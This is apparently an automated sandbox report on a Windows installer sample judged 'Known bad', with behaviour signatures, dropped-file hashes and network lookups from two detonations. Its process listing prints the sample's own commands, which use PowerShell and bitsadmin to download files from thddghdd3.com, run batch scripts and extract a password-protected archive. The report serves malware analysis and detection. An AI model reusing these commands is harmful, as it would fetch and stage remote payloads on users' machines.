Analysis Overview
SHA256
9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da
Threat Level: Known bad
The file LisectAVT_2403002A_312.exe was found to be: Known bad.
Malicious Activity Summary
Download via BitsAdmin
Loads dropped DLL
Executes dropped EXE
Checks computer location settings
Command and Scripting Interpreter: PowerShell
System Location Discovery: System Language Discovery
Unsigned PE
Enumerates physical storage devices
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Delays execution with timeout.exe
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-25 00:19
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-25 00:19
Reported
2024-07-25 00:21
Platform
win7-20240704-en
Max time kernel
147s
Max time network
122s
Command Line
Signatures
Download via BitsAdmin
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp | N/A |
| N/A | N/A | C:\ProgramData\ConsoleApp\7za.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-NH4GJ.tmp\Wise Care 365 5.9.1.582.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_312.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-NH4GJ.tmp\Wise Care 365 5.9.1.582.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\ConsoleApp\7za.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-NH4GJ.tmp\Wise Care 365 5.9.1.582.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_312.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_312.exe
"C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_312.exe"
C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp
"C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp" /SL5="$400B2,38098121,731648,C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_312.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\ProgramData\ConsoleApp\ControlSet000.bat" "
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\ProgramData\ConsoleApp\main.bat" "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('http://thddghdd3.com/hfile.bin', 'hfile.bin')"
C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer Explorers /download /priority FOREGROUND http://thddghdd3.com/Telemetry.xml C:\Users\Admin\AppData\Local\Temp\Telemetry.xml
C:\ProgramData\ConsoleApp\7za.exe
7za.exe x -y -p1r7d2kvUf3 "*.7z"
C:\Windows\SysWOW64\timeout.exe
timeout /T 3 /NOBREAK
C:\Users\Admin\AppData\Local\Temp\is-NH4GJ.tmp\Wise Care 365 5.9.1.582.exe
"C:\Users\Admin\AppData\Local\Temp\is-NH4GJ.tmp\Wise Care 365 5.9.1.582.exe"
C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp
"C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp" /SL5="$40164,36755997,64512,C:\Users\Admin\AppData\Local\Temp\is-NH4GJ.tmp\Wise Care 365 5.9.1.582.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | thddghdd3.com | udp |
Files
memory/2132-2-0x0000000000401000-0x00000000004A9000-memory.dmp
memory/2132-0-0x0000000000400000-0x00000000004C0000-memory.dmp
\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp
| MD5 | f098bb35dca6ae44a05c65aac7a5444b |
| SHA1 | c5c50d740c1b8e9d8715fc3b2c8026156295a437 |
| SHA256 | 8a0163353bdcc0882008990b0479c571c91adaca143af8c03da145b28b02e1fe |
| SHA512 | 71d8fc99a67bfc1e2b3635db6092d51d2ae9ec47f652aa10234770e878ab8bfaad69f7b971d54169363763df59ebb33143d161cd2a1cb60bc6fa2bbe6ba0227b |
\Users\Admin\AppData\Local\Temp\is-NH4GJ.tmp\_isetup\_iscrypt.dll
| MD5 | a69559718ab506675e907fe49deb71e9 |
| SHA1 | bc8f404ffdb1960b50c12ff9413c893b56f2e36f |
| SHA256 | 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc |
| SHA512 | e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63 |
memory/2316-12-0x0000000000400000-0x000000000067B000-memory.dmp
C:\ProgramData\ConsoleApp\ControlSet000.bat
| MD5 | 484c8df5d5bd9d82f4ac1861472cf519 |
| SHA1 | eddc0d20c81d9dba14ee0be32c7c5f563481e792 |
| SHA256 | f240f76de7e18fd3344eb7e5f4d6976a33a331ca12d0aff18032ef99bb3bf953 |
| SHA512 | 6cf730eb19d4b80ce045c17b8e162448d65219be0f0e04ee02245af157ffe9cceb235c182800f44d9260cfa49c44b8e7a8c0a8d1db174a8dad75c33f60bad2b7 |
C:\ProgramData\ConsoleApp\main.bat
| MD5 | 0ddc6dd98f86cff7e50c1621fd16b55a |
| SHA1 | 27e61b2bf7a367c491f25a3ef70df2ef0e38c36a |
| SHA256 | b0a5f27817ebca5a17f75d625f1c73dc0d1c2499f1d155916d5a404013856df6 |
| SHA512 | 07cb691bb23bb75c2c72c3e915b7af1f8b8c831f3d77e81c67f95c5d1ec7f754a7b823b9f1cdecd5cc511a4c34a6e8f0938eaad52f8d6451fee973ecfd2b9609 |
\ProgramData\ConsoleApp\7za.exe
| MD5 | c3d309156b8e8cf1d158de5fab1c2b40 |
| SHA1 | 58ad15d91abac2c6203e389ac8a8ff6685406d41 |
| SHA256 | 993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c |
| SHA512 | 2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498 |
memory/2132-57-0x0000000000400000-0x00000000004C0000-memory.dmp
memory/2316-58-0x0000000000400000-0x000000000067B000-memory.dmp
\Users\Admin\AppData\Local\Temp\is-NH4GJ.tmp\Wise Care 365 5.9.1.582.exe
| MD5 | 05fda662bb382c2c95b9318b2394b246 |
| SHA1 | 69365314afb6102209a806e0e474d94e58207ec6 |
| SHA256 | 1cdf90593f92f8de7a6a8b812756ff9359a0a9827f0843ef40e1983f17d6b8d2 |
| SHA512 | b8d792f5529672227b94c55a2e914b8bbc569d9ce70e5c17022a5568dc51febb4fb0a497009d4975f8dc7574989041edf093285d62c34f09d5d55da09869f312 |
memory/1988-66-0x0000000000400000-0x0000000000417000-memory.dmp
\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp
| MD5 | 9d7850e858c24db77b91b25adf93812f |
| SHA1 | f0bb0a9074b38dad7492422247c0a316197d26b6 |
| SHA256 | c062235322d35c79cfde7aea5fd90e9589e5fbca738ed41ab66de382e1a1b2e8 |
| SHA512 | e08084f265913a71d55750b75bbb01d1c43baa68d57eb9d6bc4ed46076577536b10901c06b92c66a926e07e268593b69936050cfacb8ed8e62b8fad86444e8ec |
\Users\Admin\AppData\Local\Temp\is-A3D0Q.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
memory/1740-84-0x0000000000600000-0x0000000000616000-memory.dmp
\Users\Admin\AppData\Local\Temp\is-A3D0Q.tmp\ISTask.dll
| MD5 | 86a1311d51c00b278cb7f27796ea442e |
| SHA1 | ac08ac9d08f8f5380e2a9a65f4117862aa861a19 |
| SHA256 | e916bdf232744e00cbd8d608168a019c9f41a68a7e8390aa48cfb525276c483d |
| SHA512 | 129e4b8dd2665bcfc5e72b4585343c51127b5d027dbb0234291e7a197baeca1bab5ed074e65e5e8c969ee01f9f65cc52c9993037416de9bfff2f872e5aeba7ec |
\Users\Admin\AppData\Local\Temp\is-A3D0Q.tmp\VclStylesInno.dll
| MD5 | b0ca93ceb050a2feff0b19e65072bbb5 |
| SHA1 | 7ebbbbe2d2acd8fd516f824338d254a33b69f08d |
| SHA256 | 0e93313f42084d804b9ac4be53d844e549cfcaf19e6f276a3b0f82f01b9b2246 |
| SHA512 | 37242423e62af30179906660c6dbbadca3dc2ba9e562f84315a69f3114765bc08e88321632843dbd78ba1728f8d1ce54a4edfa3b96a9d13e540aee895ae2d8e2 |
memory/1740-94-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-114-0x0000000007560000-0x0000000007561000-memory.dmp
memory/1740-145-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-144-0x0000000007600000-0x0000000007601000-memory.dmp
memory/1740-142-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-141-0x00000000075F0000-0x00000000075F1000-memory.dmp
memory/1740-140-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-139-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-138-0x00000000075E0000-0x00000000075E1000-memory.dmp
memory/1740-137-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-136-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-135-0x00000000075D0000-0x00000000075D1000-memory.dmp
memory/1740-134-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-132-0x00000000075C0000-0x00000000075C1000-memory.dmp
memory/1740-131-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-130-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-129-0x00000000075B0000-0x00000000075B1000-memory.dmp
memory/1740-128-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-127-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-126-0x00000000075A0000-0x00000000075A1000-memory.dmp
memory/1740-125-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-124-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-123-0x0000000007590000-0x0000000007591000-memory.dmp
memory/1740-122-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-121-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-120-0x0000000007580000-0x0000000007581000-memory.dmp
memory/1740-119-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-118-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-117-0x0000000007570000-0x0000000007571000-memory.dmp
memory/1740-116-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-115-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-113-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-112-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-111-0x0000000007550000-0x0000000007551000-memory.dmp
memory/1740-110-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-109-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-108-0x00000000024A0000-0x00000000024A1000-memory.dmp
memory/1740-107-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-106-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-105-0x0000000002490000-0x0000000002491000-memory.dmp
memory/1740-104-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-143-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-99-0x0000000002470000-0x0000000002471000-memory.dmp
memory/1740-98-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-97-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-133-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-96-0x0000000002460000-0x0000000002461000-memory.dmp
memory/1740-95-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-93-0x0000000002450000-0x0000000002451000-memory.dmp
memory/1740-92-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-91-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-103-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-102-0x0000000002480000-0x0000000002481000-memory.dmp
memory/1740-101-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-100-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-90-0x0000000001F30000-0x0000000001F31000-memory.dmp
memory/1740-88-0x00000000070F0000-0x000000000740A000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-25 00:19
Reported
2024-07-25 00:22
Platform
win10v2004-20240709-en
Max time kernel
150s
Max time network
128s
Command Line
Signatures
Download via BitsAdmin
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-L8J7F.tmp\LisectAVT_2403002A_312.tmp | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-L8J7F.tmp\LisectAVT_2403002A_312.tmp | N/A |
| N/A | N/A | C:\ProgramData\ConsoleApp\7za.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-L9JQR.tmp\Wise Care 365 5.9.1.582.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-L8J7F.tmp\LisectAVT_2403002A_312.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-L9JQR.tmp\Wise Care 365 5.9.1.582.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-L8J7F.tmp\LisectAVT_2403002A_312.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\ConsoleApp\7za.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_312.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-L8J7F.tmp\LisectAVT_2403002A_312.tmp | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_312.exe
"C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_312.exe"
C:\Users\Admin\AppData\Local\Temp\is-L8J7F.tmp\LisectAVT_2403002A_312.tmp
"C:\Users\Admin\AppData\Local\Temp\is-L8J7F.tmp\LisectAVT_2403002A_312.tmp" /SL5="$80092,38098121,731648,C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_312.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\ConsoleApp\ControlSet000.bat" "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\ConsoleApp\main.bat" "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('http://thddghdd3.com/hfile.bin', 'hfile.bin')"
C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer Explorers /download /priority FOREGROUND http://thddghdd3.com/Telemetry.xml C:\Users\Admin\AppData\Local\Temp\Telemetry.xml
C:\ProgramData\ConsoleApp\7za.exe
7za.exe x -y -p1r7d2kvUf3 "*.7z"
C:\Windows\SysWOW64\timeout.exe
timeout /T 3 /NOBREAK
C:\Users\Admin\AppData\Local\Temp\is-L9JQR.tmp\Wise Care 365 5.9.1.582.exe
"C:\Users\Admin\AppData\Local\Temp\is-L9JQR.tmp\Wise Care 365 5.9.1.582.exe"
C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp
"C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp" /SL5="$802D0,36755997,64512,C:\Users\Admin\AppData\Local\Temp\is-L9JQR.tmp\Wise Care 365 5.9.1.582.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.143.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | thddghdd3.com | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.142.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
Files
memory/3848-0-0x0000000000400000-0x00000000004C0000-memory.dmp
memory/3848-2-0x0000000000401000-0x00000000004A9000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-L8J7F.tmp\LisectAVT_2403002A_312.tmp
| MD5 | f098bb35dca6ae44a05c65aac7a5444b |
| SHA1 | c5c50d740c1b8e9d8715fc3b2c8026156295a437 |
| SHA256 | 8a0163353bdcc0882008990b0479c571c91adaca143af8c03da145b28b02e1fe |
| SHA512 | 71d8fc99a67bfc1e2b3635db6092d51d2ae9ec47f652aa10234770e878ab8bfaad69f7b971d54169363763df59ebb33143d161cd2a1cb60bc6fa2bbe6ba0227b |
memory/3572-6-0x0000000000400000-0x000000000067B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-L9JQR.tmp\_isetup\_iscrypt.dll
| MD5 | a69559718ab506675e907fe49deb71e9 |
| SHA1 | bc8f404ffdb1960b50c12ff9413c893b56f2e36f |
| SHA256 | 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc |
| SHA512 | e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63 |
C:\ProgramData\ConsoleApp\ControlSet000.bat
| MD5 | 484c8df5d5bd9d82f4ac1861472cf519 |
| SHA1 | eddc0d20c81d9dba14ee0be32c7c5f563481e792 |
| SHA256 | f240f76de7e18fd3344eb7e5f4d6976a33a331ca12d0aff18032ef99bb3bf953 |
| SHA512 | 6cf730eb19d4b80ce045c17b8e162448d65219be0f0e04ee02245af157ffe9cceb235c182800f44d9260cfa49c44b8e7a8c0a8d1db174a8dad75c33f60bad2b7 |
C:\ProgramData\ConsoleApp\main.bat
| MD5 | 0ddc6dd98f86cff7e50c1621fd16b55a |
| SHA1 | 27e61b2bf7a367c491f25a3ef70df2ef0e38c36a |
| SHA256 | b0a5f27817ebca5a17f75d625f1c73dc0d1c2499f1d155916d5a404013856df6 |
| SHA512 | 07cb691bb23bb75c2c72c3e915b7af1f8b8c831f3d77e81c67f95c5d1ec7f754a7b823b9f1cdecd5cc511a4c34a6e8f0938eaad52f8d6451fee973ecfd2b9609 |
memory/2380-25-0x00000000033B0000-0x00000000033E6000-memory.dmp
memory/2380-26-0x0000000005B90000-0x00000000061B8000-memory.dmp
memory/2380-27-0x00000000059B0000-0x00000000059D2000-memory.dmp
memory/2380-28-0x00000000062C0000-0x0000000006326000-memory.dmp
memory/2380-29-0x0000000006330000-0x0000000006396000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g1jgcp3q.1wi.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2380-39-0x00000000064C0000-0x0000000006814000-memory.dmp
memory/2380-40-0x0000000006960000-0x000000000697E000-memory.dmp
memory/2380-41-0x0000000006980000-0x00000000069CC000-memory.dmp
memory/2380-42-0x0000000007F90000-0x000000000860A000-memory.dmp
memory/2380-43-0x0000000006E70000-0x0000000006E8A000-memory.dmp
C:\ProgramData\ConsoleApp\7za.exe
| MD5 | c3d309156b8e8cf1d158de5fab1c2b40 |
| SHA1 | 58ad15d91abac2c6203e389ac8a8ff6685406d41 |
| SHA256 | 993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c |
| SHA512 | 2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498 |
C:\Users\Admin\AppData\Local\Temp\is-L9JQR.tmp\Wise Care 365 5.9.1.582.exe
| MD5 | 05fda662bb382c2c95b9318b2394b246 |
| SHA1 | 69365314afb6102209a806e0e474d94e58207ec6 |
| SHA256 | 1cdf90593f92f8de7a6a8b812756ff9359a0a9827f0843ef40e1983f17d6b8d2 |
| SHA512 | b8d792f5529672227b94c55a2e914b8bbc569d9ce70e5c17022a5568dc51febb4fb0a497009d4975f8dc7574989041edf093285d62c34f09d5d55da09869f312 |
memory/888-51-0x0000000000400000-0x0000000000417000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp
| MD5 | 9d7850e858c24db77b91b25adf93812f |
| SHA1 | f0bb0a9074b38dad7492422247c0a316197d26b6 |
